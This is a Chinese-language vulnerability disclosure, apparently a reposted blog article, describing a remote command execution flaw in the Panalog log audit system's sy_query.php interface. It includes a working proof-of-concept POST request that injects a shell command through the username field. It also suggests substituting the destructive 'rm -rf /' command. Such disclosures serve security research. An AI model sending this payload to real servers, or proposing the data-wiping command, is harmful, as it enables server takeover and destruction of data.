本文共 871 字，大约阅读时间需要 2 分钟。

Panalog 日志审计系统安全漏洞分析

产品简介

Panalog 是一款专注于网络设备日志审计的系统，旨在提供实时监控、日志分析和安全管理功能。通过本地或远程方式，用户可以统一收集、存储和审计海量网络设备的日志信息，便于快速定位问题并进行数据分析。

漏洞概述

在对 Panalog 系统的深入审计中，我们发现 sy_query.php 接口存在严重的远程命令执行漏洞。这一漏洞可能允许攻击者通过特定参数向服务器执行任意命令，从而接管服务器的权限，导致严重的安全风险。

复现环境

为了便于安全研究和漏洞复现，建议在以下环境下测试：

• 目标服务器: 需配置 Panalog 系统，确保 sy_query.php 接口可用。
• 工具: 具备 POST 请求功能的工具（如 curl）。
• 防火墙和权限: 确保测试环境的安全性，防止漏洞外泄。

漏洞复现

PoC-1: 远程命令执行

通过向 sy_query.php 发送特定参数，可以执行任意命令。以下是示例请求：

POST /account/sy_query.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
Connection: close
username=;whoami>1.txt

测试结果

• 请求成功: 如果服务器响应状态码为 200 OK，说明漏洞存在。
• 命令执行: 将 whoami 替换为其他命令（如 rm -rf /）可进一步测试攻击向量。

注意事项

在进行漏洞测试前，请确保测试环境的合法性。未经授权的攻击行为可能导致法律后果。建议及时与相关厂商进行沟通，获取漏洞修复方案。

转载地址：http://knvfk.baihongyu.com/